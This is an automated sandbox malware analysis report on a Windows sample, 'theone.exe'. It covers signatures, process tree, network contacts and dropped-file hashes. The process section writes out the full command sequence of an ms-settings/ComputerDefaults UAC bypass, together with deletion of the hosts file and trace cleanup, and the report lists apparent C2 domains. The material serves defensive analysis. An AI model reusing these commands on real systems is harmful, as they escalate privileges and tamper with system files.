Malware Analysis Report

2024-12-07 16:50

Sample ID 241113-efyx2swdrp
Target theone.txt
SHA256 8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959
Tags defense_evasion
Score 7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 7/10

SHA256 8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959

Threat Level: Shows suspicious behavior

The file theone.txt was classified as: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion

Checks computer location settings

Indicator Removal: File Deletion

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 03:53

Signatures

Unsigned PE

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 03:53

Reported

2024-11-13 03:53

Platform

win10ltsc2021-20241023-en

Max time kernel

11s

Max time network

12s

Command Line

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

Signatures

Checks computer location settings

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |

Enumerates physical storage devices

Modifies registry class

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\366403.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |

Suspicious use of SetWindowsHookEx

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1060 wrote to memory of 3392 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 1060 wrote to memory of 3392 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 3392 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |
| PID 3392 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |
| PID 1060 wrote to memory of 2512 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 1060 wrote to memory of 2512 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 2512 wrote to memory of 4220 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |
| PID 2512 wrote to memory of 4220 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |
| PID 2512 wrote to memory of 4064 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |
| PID 2512 wrote to memory of 4064 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |
| PID 1060 wrote to memory of 1808 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 1060 wrote to memory of 1808 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 1808 wrote to memory of 2424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\ComputerDefaults.exe |
| PID 1808 wrote to memory of 2424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\ComputerDefaults.exe |
| PID 2424 wrote to memory of 4208 | N/A | C:\Windows\system32\ComputerDefaults.exe | C:\Windows\system32\wscript.exe |
| PID 2424 wrote to memory of 4208 | N/A | C:\Windows\system32\ComputerDefaults.exe | C:\Windows\system32\wscript.exe |
| PID 4208 wrote to memory of 1208 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 4208 wrote to memory of 1208 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 1060 wrote to memory of 3096 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 1060 wrote to memory of 3096 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 1060 wrote to memory of 2832 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 1060 wrote to memory of 2832 | N/A | C:\Users\Admin\AppData\Local\Temp\theone.exe | C:\Windows\system32\cmd.exe |
| PID 2832 wrote to memory of 2964 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |
| PID 2832 wrote to memory of 2964 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe |

Processes

C:\Users\Admin\AppData\Local\Temp\theone.exe

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\366403.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\366403.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\366403.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\366403.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | zetolacs-cloud.top | udp |
| US | 172.67.206.185:443 | zetolacs-cloud.top | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 185.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |

Files

memory/1060-0-0x000001BB57070000-0x000001BB57071000-memory.dmp

memory/1060-1-0x000001BB57080000-0x000001BB57081000-memory.dmp

memory/1060-2-0x000001BB589D0000-0x000001BB589D1000-memory.dmp

memory/1060-4-0x000001BB589F0000-0x000001BB589F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\366403.vbs

MD5 8b4ed5c47fdddbeba260ef11cfca88c6
SHA1 868f11f8ed78ebe871f9da182d053f349834b017
SHA256 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA512 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf